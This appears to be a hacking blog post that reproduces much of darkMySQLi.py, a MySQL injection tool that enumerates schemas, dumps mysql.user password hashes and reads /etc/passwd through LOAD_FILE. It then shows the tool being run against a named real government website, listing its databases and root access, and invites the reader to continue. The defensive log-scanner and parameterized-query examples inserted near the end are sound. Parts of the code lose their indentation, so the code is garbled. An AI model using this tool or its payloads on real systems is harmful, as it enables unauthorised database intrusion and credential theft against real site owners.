    print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno))
    if yesno == "YES <-- w00t w00t":
        print "\n[+] Dumping MySQL user info. host:user:password";file.write("\n\n[+] Dumping MySQL user info. host:user:password")
        head_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+mysql.user"+arg_end
        source = GetThatShit(head_URL)
        match = re.findall("\x1e\x1e\S+",source);match = match[0].strip("\x1e").split("\x1e");userend = match[0]
        print "[+] Number of users in the mysql.user table:",userend;file.write("[+] Number of users in the mysql.user table: "+str(userend))
        head_URL = site.replace("darkc0de","concat(0x1e,0x1e,host,0x1e,user,0x1e,password,0x1e,0x20)")
        head_URL = head_URL+"+FROM+mysql.user+LIMIT+NUM,1"+arg_end
        for x in range(0,int(userend)):
            try:
                source = GetThatShit(head_URL.replace("NUM",str(x)))
                match = re.findall("\x1e\x1e\S+",source)
                match = match[0].strip("\x1e").split("\x1e")
                if len(match) != 3:
                    nullvar = "NULL"
                    match += nullvar
                print "\t["+str(x)+"]",match[0]+":"+match[1]+":"+match[2];file.write("\n["+str(x)+"] "+str(match[0])+":"+str(match[1])+":"+str(match[2]))
            except (KeyboardInterrupt, SystemExit):
                raise
            except:
                pass
    else:
        print "\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!"
        file.write("\n\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!")
    head_URL = site.replace("darkc0de","concat(load_file(0x2f6574632f706173737764),0x3a,0x6461726b63306465)")+arg_end
    source = GetThatShit(head_URL)
    match = re.findall("darkc0de",source)
    if len(match) >= 1:
        yesno = "YES <-- w00t w00t"
    else:
        yesno = "NO"
    print "\n[+] Do we have Access to Load_File:",yesno;file.write("\n\n[+] Do we have Access to Load_File: "+str(yesno))
    if yesno == "YES <-- w00t w00t":
        fuzz_load = open(loadfilefuzz, "r").readlines()
        head_URL = site.replace("darkc0de","concat(load_file('%2Fetc%2Fpasswd'),0x3a,0x6461726b63306465)")+arg_end
        source = GetThatShit(head_URL)
        match = re.findall("darkc0de",source)
        if len(match) > 1:
            onoff = "OFF <-- w00t w00t"
        else:
            onoff = "ON"
        print "\n[+] Magic quotes are:",onoff
        yesno = str(raw_input("\n[!] Would You like to fuzz LOAD_FILE (Yes/No): "))
        if yesno == "Y" or yesno == "y" or yesno == "Yes" or yesno == "yes":
            print "\n[+] Starting Load_File Fuzzer...";file.write("\n\n[+] Starting Load_File Fuzzer...")
            print "[+] Number of system files to be fuzzed:",len(fuzz_load),"\n";file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_load))+"\n")
            for sysfile in fuzz_load:
                sysfile = sysfile.rstrip("\n")
                if proxy != "None":
                    sysfile = sysfile.replace("/","%2F")
                    sysfile = sysfile.replace(".","%2E")
                if onoff == "OFF <-- w00t w00t":
                    head_URL = site.replace("darkc0de","concat(LOAD_FILE(\'"+sysfile+"\'),0x3a,0x6461726b63306465)")+arg_end
                else:
                    head_URL = site.replace("darkc0de","concat(LOAD_FILE(0x"+sysfile.encode("hex")+"),0x3a,0x6461726b63306465)")+arg_end
                source = GetThatShit(head_URL)
                match = re.findall("darkc0de",source)
                if len(match) > 0:
                    print "[!] Found",sysfile;file.write("\n[!] Found "+sysfile)
                    head_URL = head_URL.replace("concat(","")
                    head_URL = head_URL.replace(",0x3a,0x6461726b63306465)","")
                    print "[!]",head_URL;file.write("\n[!] "+head_URL)
    else:
        print "\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!"
        file.write("\n\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!")

#Fuzz table/columns
if mode == "--fuzz":
    fuzz_tables = open(tablefuzz, "r").readlines()
    fuzz_columns = open(columnfuzz, "r").readlines()
    print "[+] Beginning table and column fuzzer...";file.write("[+] Beginning table and column fuzzer...")
    print "[+] Number of tables names to be fuzzed:",len(fuzz_tables);file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_tables)))
    print "[+] Number of column names to be fuzzed:",len(fuzz_columns);file.write("\n[+] Number of column names to be fuzzed: "+str(len(fuzz_columns)))
    print "[+] Searching for tables and columns...";file.write("\n[+] Searching for tables and columns...")
    if arg_blind == "--blind":
        fuzz_URL = site+"+and+(SELECT+1+from+TABLE+limit+0,1)=1"
    else:
        fuzz_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+TABLE"+arg_end
    for table in fuzz_tables:
        table = table.rstrip("\n")
        table_URL = fuzz_URL.replace("TABLE",table)
        source = GetThatShit(table_URL)
        if arg_blind == "--blind":
            match = re.findall(arg_string,source)
        else:
            match = re.findall("darkc0de", source);
        if len(match) > 0:
            print "\n[!] Found a table called:",table;file.write("\n\n[+] Found a table called: "+str(table))
            print "\n[+] Now searching for columns inside table \""+table+"\"";file.write("\n\n[+] Now searching for columns inside table \""+str(table)+"\"")
            if arg_blind == "--blind":
                table_URL = site+"+and+(SELECT+substring(concat(1,COLUMN),1,1)+from+"+table+"+limit+0,1)=1"
            for column in fuzz_columns:
                column = column.rstrip("\n")
                if arg_blind == "--blind":
                    column_URL = table_URL.replace("COLUMN",column)
                else:
                    column_URL = table_URL.replace("0x6461726b63306465","concat(0x6461726b63306465,0x3a,"+column+")")
                source = GetThatShit(column_URL)
                if arg_blind == "--blind":
                    match = re.findall(arg_string,source)
                else:
                    match = re.findall("darkc0de",source)
                if len(match) > 0:
                    print "[!] Found a column called:",column;file.write("\n[!] Found a column called:"+column)
            print "[-] Done searching inside table \""+table+"\" for columns!";file.write("\n[-] Done searching inside table \""+str(table)+"\" for columns!")

#Build URLS for each different mode
if mode == "--schema":
    if arg_database != "None" and arg_table == "None":
        if arg_blind == "--blind":
            print "[+] Showing Tables from database \""+arg_database+"\"";file.write("\n[+] Showing Tables from database \""+arg_database+"\"")
            count_URL = site+"+and+((SELECT+COUNT(table_name)"
            count_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex")+"))"
            line_URL = site+"+and+ascii(substring((SELECT+table_name"
            line_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex")
        else:
            print "[+] Showing Tables & Columns from database \""+arg_database+"\""
            file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"")
            line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
            line_URL += "+FROM+information_schema.columns+WHERE+table_schema=0x"+arg_database.encode("hex")
            count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(table_schema),0x1e,0x20)")
            count_URL += "+FROM+information_schema.tables+WHERE+table_schema=0x"+arg_database.encode("hex")
        arg_row = "Tables"
    if arg_database != "None" and arg_table != "None":
        if arg_blind == "--blind":
            print "[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\""
            file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
            count_URL = site+"+and+((SELECT+COUNT(column_name)"
            count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")+"))"
            line_URL = site+"+and+ascii(substring((SELECT+column_name"
            line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")
        else:
            print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\""
            file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
            line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
            line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")
            count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
            count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")
arg_row = "Columns"

elif mode == "--dump":
print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\""
file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"")
print "[+] and Column(s) "+str(arg_columns);file.write("\n[+] Column(s) "+str(arg_columns))
if arg_blind == "--blind":
darkc0de = ""
for column in arg_columns:
darkc0de += column+",0x3a,"
darkc0de = darkc0de.rstrip("0x3a,")
count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"+arg_database+"."+arg_table
line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+"+arg_database+"."+arg_table
else:
for column in arg_columns:
darkc0de += column+",0x1e,"
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table
line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table
if arg_where != "" or arg_orderby != "":
if arg_where != "":
arg_where = arg_where.split(",")
print "[+] WHERE clause:","\""+arg_where[0]+"="+arg_where[1]+"\""
arg_where = "WHERE+"+arg_where[0]+"="+"0x"+arg_where[1].encode("hex")
if arg_orderby != "":
arg_orderby = "ORDER+BY+'"+arg_orderby+"'"
print "[+] ORDERBY clause:",arg_orderby
count_URL += "+"+arg_where
line_URL += "+"+arg_where+"+"+arg_orderby
if version[0] == 4:
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_table
line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_table

elif mode == "--full":
print "[+] Starting full SQLi information_schema enumeration..."
line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
line_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex")
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex")

elif mode == "--dbs":
print "[+] Showing all databases current user has access too!"
file.write("\n[+] Showing all databases current user has access too!")
if arg_blind == "--blind":
count_URL = site+"+and+((SELECT+COUNT(schema_name)"
count_URL += "+FROM+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")+"))"
line_URL = site+"+and+ascii(substring((SELECT+schema_name"
line_URL += "+from+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")
else:
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex")
line_URL = site.replace("darkc0de","concat(0x1e,0x1e,schema_name,0x1e,0x20)")
line_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex")
arg_row = "Databases"

if arg_blind == "--blind":
count_URL+="))"
line_URL+="+LIMIT+"
else:
count_URL += arg_end
line_URL += "+LIMIT+NUM,1"+arg_end

## Blind Info --- I know it doesnt make sence where this code is.. but.. fuck it...
if mode == "--info" and arg_blind == "--blind":
head_URL = site+"+and+(SELECT+1+from+mysql.user+limit+0,1)=1"
source = GetThatShit(head_URL)
match = re.findall(arg_string,source)
if len(match) >= 1:
yesno = "YES <-- w00t w00t\n[!] Retrieve Info: --dump -D mysql -T user -C user,password"
else:
yesno = "NO"
print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno))
print "\n[+] Showing database version, username@location, and database name!"
file.write("\n\n[+] Showing database version, username@location, and database name!")
line_URL = site+"+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),"
row_value = 1

#Lets Count how many rows or columns
if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full":
if arg_blind == "--blind":
row_value = GuessValue(count_URL)
else:
source = GetThatShit(count_URL)
match = re.findall("\x1e\x1e\S+",source)
match = match[0][2:].split("\x1e")
row_value = match[0]
print "[+] Number of "+arg_row+": "+str(row_value);file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n")

## UNION Schema Enumeration and DataExt loop
if arg_blind == "--union":
if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full":
while int(table_num) != int(row_value):
try:
source = GetThatShit(line_URL.replace("NUM",str(num)))
match = re.findall("\x1e\x1e\S+",source)
if len(match) >= 1:
if mode == "--schema" or mode == "--full":
match = match[0][2:].split("\x1e")
if cur_db != match[0]:
cur_db = match[0]
if table_num == 0:
print "\n[Database]: "+match[0];file.write("\n[Database]: "+match[0]+"\n")
else:
print "\n\n[Database]: "+match[0];file.write("\n\n[Database]: "+match[0]+"\n")
print "[Table: Columns]";file.write("[Table: Columns]\n")
if cur_table != match[1]:
print "\n["+str(table_num+1)+"]"+match[1]+": "+match[2],
file.write("\n["+str(table_num+1)+"]"+match[1]+": "+match[2])
cur_table = match[1]
#table_num+=1
table_num = int(table_num) + 1
else:
sys.stdout.write(",%s" % (match[2]))
file.write(","+match[2])
sys.stdout.flush()
#Gathering Databases only
elif mode == "--dbs":
match = match[0]
if table_num == 0:
print "\n["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match))
else:
print "["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match))
table_num+=1
#Collect data from tables & columns
elif mode == "--dump":
match = re.findall("\x1e\x1e+.+\x1e\x1e",source)
if match == []:
match = ['']
else:
match = match[0].strip("\x1e").split("\x1e")
if arg_rowdisp == 1:
print "\n["+str(num+1)+"] ",;file.write("\n["+str(num+1)+"] ",)
else:
print;file.write("\n")
for ddata in match:
if ddata == "":
ddata = "NoDataInColumn"
sys.stdout.write("%s:" % (ddata))
file.write("%s:" % ddata)
sys.stdout.flush()
table_num+=1
else:
if mode == "--dump":
table_num+=1
sys.stdout.write("\n[%s] No data" % (num))
file.write("\n[%s] No data" % (num))
break
num+=1
except (KeyboardInterrupt, SystemExit):
raise
except:
pass

## Blind Schema Enumeration and DataExt loop
if arg_blind == "--blind":
if mode == "--schema" or mode == "--dbs" or mode == "--dump" or mode == "--info":
lower_bound = 0
upper_bound = 127
print
for data_row in range(int(num), row_value):
sys.stdout.write("[%s]: " % (lim_num))
file.write("\n[%s]: " % (lim_num))
sys.stdout.flush()
value = chr(upper_bound)
while value != chr(0):
if mode == "--info":
Guess_URL = line_URL + str(let_pos)+",1))"
else:
Guess_URL = line_URL + str(lim_num) +",1),"+str(let_pos)+",1))"
value = chr(GuessValue(Guess_URL))
sys.stdout.write("%s" % (value))
file.write(value)
sys.stdout.flush()
let_pos+=1
print
lim_num = int(lim_num) + 1
let_pos = 1
data_row+=1

#Lets wrap it up!
if mode == "--schema" or mode == "--full" or mode == "--dump":
print "\n\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X"))
else:
print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X"))
print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets))
print "[-] Done\n";file.write("\n[-] Done\n")
print "Don't forget to check", logfile,"\n"
file.close()
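A defender-side counterpart to the URL builder above, added here as an example and not part of darkMySQLi: it decodes the query string of each access-log request and flags the shapes this script emits (UNION SELECT probes, the `darkc0de` marker and its hex form, the `0x1e` concat delimiters, `information_schema` enumeration, the `ascii(substring((SELECT` blind guess and the `mysql.user` check). The combined log format, the IP 192.0.2.10 and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Query-string patterns matching the URL shapes built by the script above
# (constructed for this example; tune them against your own traffic before relying on them).
SIGNATURES = {
    "union_select": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "marker":       re.compile(r"darkc0de|0x6461726b63306465", re.I),
    "delimiter":    re.compile(r"concat\(\s*0x1e\s*,", re.I),
    "schema_enum":  re.compile(r"information_schema\.(columns|tables|schemata)", re.I),
    "blind_bisect": re.compile(r"ascii\(\s*substring\(\s*\(SELECT\b", re.I),
    "mysql_users":  re.compile(r"\bFROM\s+mysql\.user\b", re.I),
}

# Apache/nginx "combined" log format (assumed); the request target is logged exactly as sent.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def classify(raw_query):
    """Return the names of every signature that fires on one decoded query string."""
    query = unquote_plus(raw_query)  # the tool sends '+' for spaces and %28/%29 for parentheses
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]

def scan_log(lines):
    """Return one finding per request whose query string fires at least one signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        hits = classify(query)
        if hits:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"), "path": path,
                             "ua": m.group("ua"), "hits": hits})
    return findings

# Constructed sample: one legitimate request, then three shaped like the tool's probes.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/May/2009:13:15:59 +0700] "GET /hki/news/news.php?id=37 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [12/May/2009:13:16:13 +0700] "GET /hki/news/news.php?id=37+AND+1=2+UNION+SELECT+1,2,3,4,5,6-- HTTP/1.1" 200 5120 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"',
    '192.0.2.10 - - [12/May/2009:13:19:50 +0700] "GET /hki/news/news.php?id=37+AND+1=2+UNION+SELECT+1,2,concat(0x1e,0x1e,schema_name,0x1e,0x20),4,5,6+FROM+information_schema.schemata+LIMIT+0,1-- HTTP/1.1" 200 5200 "-" "Opera/8.00 (Windows NT 5.1; U; en)"',
    '192.0.2.10 - - [12/May/2009:13:25:02 +0700] "GET /hki/news/news.php?id=37+and+ascii(substring((SELECT+schema_name+from+information_schema.schemata+LIMIT+0,1),1,1))>64-- HTTP/1.1" 200 5120 "-" "Opera/8.00 (Windows NT 5.1; U; en)"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("%(ts)s %(ip)s %(path)s -> %(hits)s [UA: %(ua)s]" % f)
```

Note how the same source address cycles through different User-Agent strings between the flagged requests, which matches the agent rotation visible in the transcript below and is a useful second signal.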

Or download the source code here or here.

The target this time is http://www.inovasi.lipi.go.id/hki/news/news.php?id=37
Here is how:
C:\Python25>darkmysqli.py --findcol -u http://www.inovasi.lipi.go.id/hki/news/news.php?id=37

|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.inovasi.lipi.go.id/hki/news/news.php?id=37
[+] 13:16:13
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Building Proxy List...
Proxy:127.0.0.1:9666 - Success
[+] Proxy List Complete
[+] Attempting To find the number of columns...
[+] Testing: 1,2,3,4,5,6,
[+] Column Length is: 6
[+] Found null column at column #: 3,5,6,

[!] SQLi URL: http://www.inovasi.lipi.go.id/hki/news/news.php?id=37+AND+1=2+UNION+SELECT+1,2,3,4,5,6--
[!] darkMySQLi URL: http://www.inovasi.lipi.go.id/hki/news/news.php?id=37+AND+1=2+UNION+SELECT+1,2,darkc0de,4,darkc0de,darkc0de--

[-] [13:16:23]
[-] Total URL Requests: 6
[-] Done

C:\Python25>darkmysqli.py --info -u http://www.inovasi.lipi.go.id/hki/news/news.php?id=37+AND+1=2+UNION+SELECT+1,2,darkc0de,4,darkc0de,darkc0de--

|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.inovasi.lipi.go.id/hki/news/news.php?id=37+AND+1=2+UNION+SELECT+1,2,darkc0de,4,darkc0de,darkc0de
[+] 13:17:37
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[+] Building Proxy List...
Proxy:127.0.0.1:9666 - Success
[+] Proxy List Complete
[+] Gathering MySQL Server Configuration...
Database: sean1
User: root@localhost
Version: 5.0.51a-24+lenny1

[+] Do we have Access to MySQL Database: YES <-- w00t w00t
[+] Dumping MySQL user info. host:user:password
[+] Number of users in the mysql.user table: 6
[+] Do we have Access to Load_File: YES <-- w00t w00t

[-] [13:18:06]
[-] Total URL Requests: 11
[-] Done

C:\Python25>darkmysqli.py --dbs -u http://www.inovasi.lipi.go.id/hki/news/news.php?id=37+AND+1=2+UNION+SELECT+1,2,darkc0de,4,darkc0de,darkc0de--

|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.inovasi.lipi.go.id/hki/news/news.php?id=37+AND+1=2+UNION+SELECT+1,2,darkc0de,4,darkc0de,darkc0de
[+] 13:19:50
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Opera/8.00 (Windows NT 5.1; U; en)
[+] Building Proxy List...
Proxy:127.0.0.1:9666 - Success
[+] Proxy List Complete
[+] Gathering MySQL Server Configuration...
Database: sean1
User: root@localhost
Version: 5.0.51a-24+lenny1
[+] Showing all databases current user has access too!
[+] Number of Databases: 7

[1]cobajoomla
[2]dbm00dl3
[3]joomla11
[4]mikroorganisme
[5]mysql
[6]sean1
[7]wpdb_1n0v4s1

[-] [13:20:02]
[-] Total URL Requests: 9
[-] Done

The rest is up to you :)
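The other side of the walkthrough, as an added example that is neither the author's code nor anything from the target site: a constructed sqlite3 stand-in for a news.php?id= lookup, with the string-spliced query that a `37 AND 1=2 UNION SELECT ...` value rewrites, beside a version that type-checks and binds the parameter. The table names, rows and placeholder hash are all constructed.

```python
import sqlite3

def make_demo_db():
    """Constructed stand-in for the table behind a news.php?id= lookup, plus a users
    table that an injected UNION would reach. Contents are placeholders, not real data."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE users(name TEXT, pw_hash TEXT);
        INSERT INTO news VALUES (37, 'Demo headline', 'Demo body');
        INSERT INTO users VALUES ('admin', '*PLACEHOLDER_HASH');
    """)
    return db

def fetch_news_unsafe(db, id_param):
    """The pattern the tool above relies on: the raw request parameter is spliced into
    the SQL text, so a crafted value rewrites the statement instead of just the value."""
    return db.execute("SELECT id, title, body FROM news WHERE id=" + id_param).fetchall()

def fetch_news_safe(db, id_param):
    """Hardened form: reject anything that is not a plain integer, then bind the value
    as a parameter so the database engine never parses it as SQL."""
    if not id_param.isdigit():
        raise ValueError("id must be a non-negative integer, got %r" % id_param)
    return db.execute("SELECT id, title, body FROM news WHERE id=?", (int(id_param),)).fetchall()

def compare(id_param):
    """Run one request parameter through both lookups; returns (unsafe_rows, safe_result)."""
    db = make_demo_db()
    unsafe = fetch_news_unsafe(db, id_param)
    try:
        safe = fetch_news_safe(db, id_param)
    except ValueError as exc:
        safe = "rejected: %s" % exc
    return unsafe, safe

if __name__ == "__main__":
    for param in ("37", "37 AND 1=2 UNION SELECT 1,name,pw_hash FROM users"):
        print(repr(param), "->", compare(param))
```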


